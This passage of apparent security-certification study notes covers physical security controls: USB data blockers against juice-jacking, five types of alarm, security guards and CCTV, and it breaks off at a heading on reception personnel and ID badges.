● Malicious USB charging cables and plugs are also a widespread problem.
○ A USB data blocker can provide mitigation against these juice-jacking
attacks by preventing any sort of data transfer when the smartphone or
laptop is connected to a charge point.

Alarm Systems and Sensors


● There are five main types of alarm:
○ Circuit—a circuit-based alarm sounds when the circuit is opened or
closed, depending on the type of alarm.
■ This could be caused by a door or window opening or by a fence
being cut.
○ Motion detection—a motion-based alarm is linked to a detector triggered
by any movement within an area (defined by the sensitivity and range of
the detector), such as a room.
○ Noise detection—an alarm triggered by sounds picked up by a
microphone.
○ Proximity—radio frequency ID (RFID) tags and readers can be used to
track the movement of tagged objects within an area.
○ Duress—this type of alarm is triggered manually by staff if they come
under threat.

Security Guards and Cameras


● Surveillance is typically a second layer of security designed to improve the
resilience of perimeter gateways.
● CCTV (Closed Circuit Television): Installation of video cameras to supply security
monitoring data to a centralized management station.

Reception Personnel and ID Badges

